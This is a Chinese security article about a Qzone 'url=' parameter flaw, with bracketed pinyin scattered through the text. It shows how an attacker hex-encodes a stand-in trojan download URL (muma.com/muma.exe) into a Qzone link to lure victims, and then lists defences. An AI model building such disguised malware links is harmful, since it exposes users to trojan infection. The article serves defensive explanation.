一、模拟黑客攻击
这里,我们首先来了解这个漏洞的【de】具体情况【kuàng】。Qzone的【de】跨站漏洞【dòng】是网友无意中打开类似“http://user.qzone.qq.com/QQ号码?url=任意字母【mǔ】”时【shí】发现的,这时网页显【xiǎn】示为一个框架网页,中间为"无法打开网页"的空白页面(如图1);然而,当输入类似【sì】“http://user.qzone.qq.com/QQ号码?url=http://www.baidu.com”的地址时却可以正常显示,这时url后的网【wǎng】址【zhǐ】其实在【zài】幕后是加载的。那么,Qzone的跨站漏洞又是如何被黑客作【zuò】为木马的媒介的呢?
 |
| Qzone默认加载的地址要小心 |
第一步:黑客需要对该地址进行乔装改扮一番。比如:网页木马的【de】url为"http://www.muma.com/muma.exe"。黑客会【huì】使用URl加密技术【shù】来为【wéi】木马地址作掩【yǎn】护,常用的方法是把url地址转换为16进【jìn】制【zhì】,这里以ASCII码随心换为例(如图2)进行示范。
 |
| 黑客常用URL伪装器 |
第二步:黑客将Qzone的地址设置为"http://user.qzone.qq.com/QQ号码【mǎ】?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在网页上贴出Qzone的地址来引诱网友点击,用户往往点击了该地址【zhǐ】下载运行了【le】木马【mǎ】还蒙在鼓里。
二、如何防范Qzone攻击
方法1:既然这一【yī】跨站漏洞这么隐蔽,用户感染的几率也不会低。我们需要如何来防范【fàn】这一漏洞可能造成的危害呢?做到不感染【rǎn】病【bìng】毒【dú】,未雨【yǔ】绸【chóu】缪是最有效果的。因此,我们在访问网友的Qzone前,要多长几个心眼,要观察其网址【zhǐ】的形式。
一般正常的Qzone的地址是"http://user.qzone.qq.com/号码"或者"http://号码【mǎ】.qzone.qq.com/"形式的,如【rú】果出现"http://user.qzone.qq.com/QQ号码?url="的地址就要谨慎了,Qzone也可能出现类似【sì】"http://user.qzone.qq.com/号码/?url=http%3A//photo.qq.com/tips_jump.htm%23uin%3D号码%26albumid%3D393029702%26photoid%3D"的地址,如果地址里面完全没有QQ的地址段,那么为了防【fáng】止下载运【yùn】行网页木马,可以将url后的字【zì】符输入到ASCII码随心【xīn】换进行转换(如果是像以上地址的格式,可以将%后的十六进制字符逐个进行转换来获得完整地址),如果url指【zhǐ】向【xiàng】可执行文件就不能点【diǎn】击了【le】。
方法2:为了防止系统被种植网页木马,还可以安装杀毒软件和防火墙并需要开【kāi】始实时文件和网络监控,这样即使下载了网页木【mù】马也会被清【qīng】除。如果发现了可疑的Qzone地址要及时举报,让黑客成为过街【jiē】老鼠,毫无藏【cáng】身之处【chù】。
小结:Qzone的【de】跨站漏洞被用来种植【zhí】木马具有【yǒu】受众广的【de】特点,Qzone的地【dì】址经过加密化装后,又有几个人会仔细地进行甄别呢?因此,利用人们偷窥人家隐私空间的好奇心来传播木马是很有效【xiào】果的。
其实,要防范Qzone地址在你的电脑种植木马也不难,最简单的方法就是只【zhī】点击QQ资料里的Qzone地址,不去其他网站点击就可以了。另【lìng】外,需要使用具有防范IE漏洞的安【ān】全工具和【hé】杀毒软件来查杀这【zhè】类木马的【de】下载【zǎi】安装,如【rú】:瑞星【xīng】卡卡。携带木马【mǎ】的Qzone地址一经发现要马上通知网友,决不姑息,不【bú】让其他人成为黑客的牺牲品。同时【shí】,每次Qzone提示升级我【wǒ】们也最好升级不用嫌麻烦而取消升级,以免被黑客利用其他未知的漏洞。
鄂公网安备 42011102000245号